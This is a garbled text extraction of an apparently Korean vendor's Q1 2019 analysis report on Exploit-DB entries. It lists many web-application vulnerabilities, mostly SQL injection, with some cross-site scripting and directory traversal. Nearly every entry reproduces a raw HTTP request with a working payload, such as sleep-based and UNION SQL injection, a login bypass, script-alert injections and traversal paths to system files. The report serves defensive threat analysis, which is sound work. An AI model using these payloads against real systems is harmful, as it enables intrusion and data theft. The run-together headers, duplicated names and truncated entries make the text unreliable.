text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59


NetartmediaNetartmediaPHP Dating

Site

2019-03-20 46575 SQL Injection 하 중Netartmedia Jobs Portal 6.1 -

SQL Injection

POST /10.0.100.24/loginaction.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencoded

Content-Length: 59


NetartmediaNetartmediaJobs Portal

6.1




2019-03-20 46574 SQL Injection 중 중Netartmedia PHP Real Estate

Agency 4.0 - SQL Injection

POST /10.0.100.24/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)

Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(sele

ct(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0

=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1

Netartmedia

NetartmediaPHP Real

Estate Agency4.0

2019-03-20 46573 SQL Injection 중 중Netartmedia PHP Car Dealer -

SQL Injection

POST /10.0.100.24/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=d

ate&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=

NetartmediaNetartmedia

PHP CarDealer

2019-03-21 46590 SQL Injection 상 중Bootstrapy CMS - Multiple SQL

Injection

POST /10.0.100.24/modules/forums/forum-thread.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate

Connection: keep-aliveContent-Type: application/x-www-form-urlencoded

Content-Length: 59

search=&thread_id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z

email=sample%40email.tst&message=20&name=wUmrLVWz&subject=0'XOR(

if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&submit=

body=1&post-id=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&quote=1&submit=&thread-id=1

quote=0&reply=1&submit=&thread-id=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

BootstrapyBootstrapy

CMS

2019-03-21 46588 SQL Injection 하 하Placeto CMS Alpha v4 - 'page'

SQL Injection

GET /10.0.100.24/placeto/admin/edit.php?page=key HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

page=JyI" AND 1647=1647 AND "svwN"="svwN

page=JyI" AND SLEEP(5) AND "uIvY"="uIvY

NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

PlacetoPlaceto CMSAlpha v4

2019-03-21 46587 SQL Injection 하 중uHotelBooking System -

'system_page' SQL Injection

GET/10.0.100.24/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6

DNT: 1


uHotelBookinguHotelBooking

System


The Company Business

Website CMS - Multiple

Vulnerabilities

user_name=VNfn' UNION ALL SELECTNULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--WMfV&user_password=&loggin=Psop

The CompanyBusiness Website

CMS

The CompanyBusiness

Website CMS

2019-03-21 46583 SQL Injection 하 중Netartmedia Vlog System -

'email' SQL Injection

POST /10.0.100.24/index.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password

NetartmediaNetartmediaVlog System

2019-03-22 46593 SQL Injection 하 중Inout Article Base CMS - SQL

Injection

GET

/10.0.100.24/articles/portalLogin.php?d=65ded5353c5ee48d0b7d48c591b8f430&p=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&u=testHTTP/1.1

InoutInout Article

Base CMS




2019-03-22 46592 SQL Injection 하 하Meeplace Business Review

Script - 'id' SQL Injection

GET /10.0.100.24/ad/addclick.php?&id=1 RLIKE (SELECT * FROM(SELECT(SLEEP(5)))qcFZ) HTTP/1.1 Meeplace

MeeplaceBusiness

Review Script

2019-03-22 46591 SQL Injection 하 중Matri4Web Matrimony Website

Script - Multiple SQL Injection

POST /10.0.100.24/simplesearch_results.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:


Fage=18&Tage=18&caste=Any&religion=Any&submit=Submit&txtGender=-

1'%20OR%203*2*1=6%20AND%20000715=000715%20--%20&txtphoto=1&txtprofile=0

age1=18&age2=18&caste[]=Any&cboCountry[]=&city[]=Any&edu[]=Any&ms=Unmarried&occu[]=Any&religion=-1'%20OR%203*2*1=6%20AND%20000723=000723%20--%20&state[]=Any&submit=Submit&txtGender=Male&txtphoto=Show%20profiles%20with%20Photo

Matri4Web

Matri4WebMatrimonyWebsiteScript

2019-03-25 46603 SQL Injection 중 중Zeeways Matrimony CMS - SQL

Injection

POST /10.0.100.24/profile_list HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

up_cast=(select 1 and row(1,1)>(selectcount(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))xfrom (select 1 union select 2)a group by x limit 1))

ZeewaysZeeways

Matrimony CMS

2019-03-25 46602 SQL Injection 하 하Zeeways Jobsite CMS - 'id' SQL

Injection

GET /10.0.100.24/news_details.php?id=-5236" OR 1 GROUP BYCONCAT(0x716a627871,(SELECT (CASE WHEN(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2))HAVINGMIN(0)# HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1


ZeewaysZeeways

Jobsite CMS

2019-03-25 46599 SQL Injection 하 하Jettweb PHP Hazır Haber Sitesi

Scripti V3 - SQL Injection

GET /10.0.100.24/fonksiyonlar.php?fgit=videoyorumlar&videoid=1'UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL-- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Jettweb

Jettweb PHP

Hazır Haber

Sitesi Scripti V3


Jettweb PHP Hazır Haber Sitesi


(Authentication Bypass)

POST /10.0.100.24/yonetim/admingiris.php HTTP/1.1

Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

Username='=' 'or'Password='=' 'or'

Jettweb

Jettweb PHP

Hazır Haber

Sitesi Scripti V2

2019-03-25 46597 SQL Injection 하 중Jettweb PHP Hazır Haber Sitesi


GET /10.0.100.24/gallery.php?gallery_id=1' UNION ALL SELECT

NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)-- HTTP/1.1

Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Jettweb

Jettweb PHP

Hazır Haber

Sitesi Scripti V1

2019-03-25 46595 XSS 하 하Apache CouchDB 2.3.1 - Cross-

Site Scripting

GET/_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3EHTTP/1.1Host: 127.0.0.1:5984User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept: application/json

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:5984/_utils/content-type: application/jsonpragma: no-cacheOrigin: http://127.0.0.1:5984

Content-Length: 6DNT: 1Connection: closeCookie: _ga=GA1.1.781615969.1550605249Cache-Control: max-age=0

Apache CouchDBApache

CouchDB 2.3.1




2019-03-26 46612 SQL Injection 하 하SJS Simple Job Script - SQL

Injection

POST /10.0.100.24/searched HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test

SJSSJS SimpleJob Script

2019-03-26 46612 XSS 하 하SJS Simple Job Script - Cross-

Site Scripting

GET

/10.0.100.24//jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype HTTP/1.1

SJSSJS SimpleJob Script

2019-03-26 46611 Directory Traversal 하 하

Titan FTP Server Version 2019

Build 3505 - Directory Traversal

/ Local File Inclusion

GET/PreviewHandler.ashx?path=\..\..\..\..\Python27\README.txt&filename=README.txt

Titan FTP Server

Titan FTPServer

Version 2019Build 3505

2019-03-26 46612 SQL Injection 하 중 XooDigital - 'p' SQL Injection

POST /10.0.100.24/get_job_applications_ajax.php HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20

landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test

employerid=if(now()=sysdate(),sleep(0),0)

app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*

/

XooDigital XooDigital

2019-03-26 46609 SQL Injection 하 하XooGallery - Multiple SQL

Injection

GET /10.0.100.24/gal.php?gal_id=29' AND 2692=2692 AND'WCFf'='WCFf HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0


Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6


photo_id=1' AND 5479=5479#

cat_id=1' AND 9338=9338 AND 'SZIH'='SZIH

p=-8412' OR 2597=2597#

XooGallery XooGallery

2019-03-26 46608 XSS 하 하Rukovoditel ERP & CRM 2.4.1 -

'path' Cross-Site Scripting

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test

Content-Type: application/x-www-form-urlencoded

module=items/items&path=%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22VULNERABLE%22)%3E

RukovoditelRukovoditelERP & CRM2.4.1

2019-03-26 46606 SQL Injection 하 하Jettweb Php Hazır İlan Sitesi


GET /10.0.100.24/m/katgetir.php?kat=1' OR NOT 1300=1300-- rwTfHTTP/1.1 Jettweb

Jettweb Php

Hazır İlan Sitesi

Scripti V2

2019-03-27 46614 SQL Injection 중 중Jettweb Hazır Rent A Car Scripti

V4 - SQL Injection

GET /10.0.100.24/admin/index.php?admin=vitestipi&tur=VitesTipi'AND 2211=2211 AND 'fVeE'='fVeE HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate

Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6


admin=rez-gor&id=2 AND SLEEP(5)

admin=ozellikekle&itemid=1&ozellikdil=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&syf=ceviriguncelle&tur=VitesTipi

Jettweb

Jettweb Hazır

Rent A Car

Scripti V4


Jettweb PHP Hazır Rent A Car

Sitesi Scripti V2 -

'arac_kategori_id' SQL Injection

POST /10.0.100.24/fiyat-goster.html HTTP/1.1Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 59

arac_kategori_id=-1' OR 3*2*1=6 AND 000224=000224 --

Jettweb

Jettweb PHP

Hazır Rent A

Car Sitesi

Scripti V2

2019-03-28 46623 SQL Injection 하 중BigTree 4.3.4 CMS - Multiple

SQL Injection

GET /10.0.100.24/BigTree-CMS/site/index.php/admin/ajax/tags/get-page/?page='or 1=1--&sort= HTTP/1.1 BigTree

BigTree 4.3.4CMS




2019-03-28 46622 SQL Injection 하 하Job Portal 3.1 - 'job_submit'

SQL Injection

POST /10.0.100.24/newjobportal/job_search/search HTTP/1.1

Host: 10.0.100.24User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0)Gecko/20100101 Firefox/45.0Accept:


job_submit=convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))

Job PortalJob Portal

3.1

2019-03-28 46620 SQL Injection 중 상i-doit 1.12 - 'qr.php' Cross-Site

Scripting

/IP_ADDRESS/src/tools/php/qr/qr.php?url=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

i-doit i-doit 1.12

2019-03-28 46617 SQL Injection 중 중Fat Free CRM 0.19.0 - HTML

Injection

POST /comments HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept: */*;q=0.5, text/javascript, application/javascript,application/ecmascript, application/x-ecmascriptAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-CSRF-Token:xikVMkG4Le6llfW44C7CQZsD3Qz7bDgbMCbPFCtMjbzJFTfTF5SOx6xPhFDB6EL8MFNSNspHI51gZqz4V7QNMQ==Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 162DNT: 1Connection: close

utf8=%E2%9C%93&comment%5Bcommentable_id%5D=143&comment%5Bcommentable_type%5D=Contact&comment%5Bcomment%5D=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&commit=Add+Note

Fat FreeFat Free CRM

0.19.0

2019-03-28 46616 SQL Injection 중 중Airbnb Clone Script - Multiple

SQL Injection

GET/10.0.100.24/admin/edit.php?id=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0


Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-alive


checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--DXVl&number_of_guests=1

catid=-1'%20OR%203*2*1=6%20AND%20000640=000640%20--%20

pt=-1'%20OR%203*2*1=6%20AND%20000929=000929%20--%20

val=-1'%20OR%203*2*1=6%20AND%20000886=000886%20--%20

AirbnbAirbnb Clone

Script

2019-03-28 46615 Directory Traversal 하 하

Thomson Reuters Concourse &

Firm Central < 2.13.0097 -

Directory Traversal / Local File

Inclusion

GET\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1

Thomson

ThomsonReuters

Concourse &Firm Central< 2.13.0097

EDB 분석 보고서 (2019.1Q) - 펜타시큐리티시스템

Documents

Transcript of EDB 분석 보고서 (2019.1Q) - 펜타시큐리티시스템